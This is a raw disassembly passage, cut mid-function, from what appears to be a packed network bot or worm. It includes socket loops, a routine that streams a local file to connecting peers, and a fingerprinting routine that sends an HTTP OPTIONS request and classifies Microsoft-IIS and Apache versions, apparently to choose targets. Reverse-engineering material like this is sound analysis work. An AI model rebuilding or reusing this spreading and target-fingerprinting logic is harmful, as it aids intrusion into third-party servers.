jmp short loc_412806
; ---------------------------------------------------------------------------
loc_4127F9: ; CODE XREF: sub_4127D0:loc_41289B�j
mov eax, [ebp+var_20C]
inc eax
mov [ebp+var_20C], eax
loc_412806: ; CODE XREF: sub_4127D0+27�j
mov eax, [ebp+var_20C]
imul eax, 0Ch
cmp off_41DAD8[eax], 0
jz loc_4128A0
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41DAD8[eax]
lea eax, [ebp+var_22C]
push eax
call sub_407A56
add esp, 0Ch
push 20h
mov eax, [ebp+var_20C]
imul eax, 0Ch
push off_41CBA0[eax]
lea eax, [ebp+var_24C]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_22C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_24C]
push eax
lea eax, [ebp+var_22C]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_41289B
mov dword_41EBB0, 1
jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp dword_41EBB0, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset dword_41ECD0
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; sub_412D56+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; sub_412D56+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CD6E[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, dword_41CD66[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CD40
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CD40
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset dword_41DB3C
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: sub_41331E+148�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CCD8
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: sub_41331E+165�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CCDC
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: sub_41331E:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EBB4
pop ebp
retn
sub_412D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D56 proc near ; DATA XREF: sub_412E04+CA�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jnz short loc_412D8A
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D56+25�j
lea eax, [ebp+var_44]
push eax
push [ebp+var_48]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412DAE
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D56+49�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: sub_412D56+63�j
push offset dword_41CCE0
push [ebp+var_8]
lea eax, [ebp+var_44]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: sub_412D56+32�j
; sub_412D56+56�j ...
leave
retn 4
sub_412D56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E04 proc near ; DATA XREF: sub_412F07+B0�o
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_1AA = byte ptr -1AAh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1B0]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412E59
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: sub_412E04+40�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_1B4]
push dword ptr [eax]
push offset dword_41CCE4
lea eax, [ebp+var_1AA]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp+var_1B0]
push eax
push offset dword_41EBB4
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: sub_412E04+B7�j
; sub_412E04:loc_412EEA�j
mov eax, [ebp+var_1B4]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: sub_412E04+95�j
push 3E8h
push [ebp+var_4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1B8], eax
cmp [ebp+var_1B8], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: sub_412E04+B5�j
cmp [ebp+var_1B8], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: sub_412E04+C0�j
push [ebp+var_1B8]
push offset sub_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push [ebp+var_1B8]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: sub_412E04+D8�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: sub_412E04+97�j
; sub_412E04+C2�j
push [ebp+var_4]
call sub_404CBB
pop ecx
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: sub_412E04+50�j
leave
retn 4
sub_412E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; sub_41349C+2C7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CD1C
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: .packed:004168CB�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp off_41CD6E[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, dword_41CD66[ecx]
and ecx, 0FFh
mov eax, off_41CD6E[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov off_41CD6E[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and dword_41CD6A[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov dword_41CD66[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp dword_41CD66[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CD6E[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, dword_41CD66[eax]
cmp eax, dword_41CD66[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: sub_41331E+72�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
push offset dword_41CE00
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset dword_41CDF8
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset dword_41CDF0
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41331E proc near ; DATA XREF: sub_41349C+4EB�o
; sub_413CB3+27C�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push [ebp+arg_0]
lea eax, [ebp+var_14C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
push [ebp+var_10E]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push [ebp+var_10E]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
